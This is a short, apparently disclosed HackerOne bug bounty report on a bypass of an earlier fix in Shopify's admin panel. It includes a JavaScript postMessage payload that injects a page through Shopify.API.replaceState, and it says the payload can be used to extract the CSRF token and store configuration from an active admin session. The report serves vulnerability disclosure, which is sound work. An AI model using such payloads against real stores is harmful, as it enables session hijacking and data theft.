Inject page in admin panel via Shopify.API.pushState [New Payload]
Low
Vulnerability Details
The correction for #868615, allows you to use new payload:
```js
const ctx = window.open(location.origin+'/admin/themes', '_blank')
const data = JSON.stringify({
message: 'Shopify.API.replaceState',
data: {pathname: "abc:d../pages/xss#//"}
});
ctx.postMessage(data)
```
## Impact
Abuse the active admin session to extract data as:
- CSRF token.
- Store config.
Actions
View on HackerOneReport Stats
- Report ID: 883867
- State: Closed
- Substate: resolved
- Upvotes: 19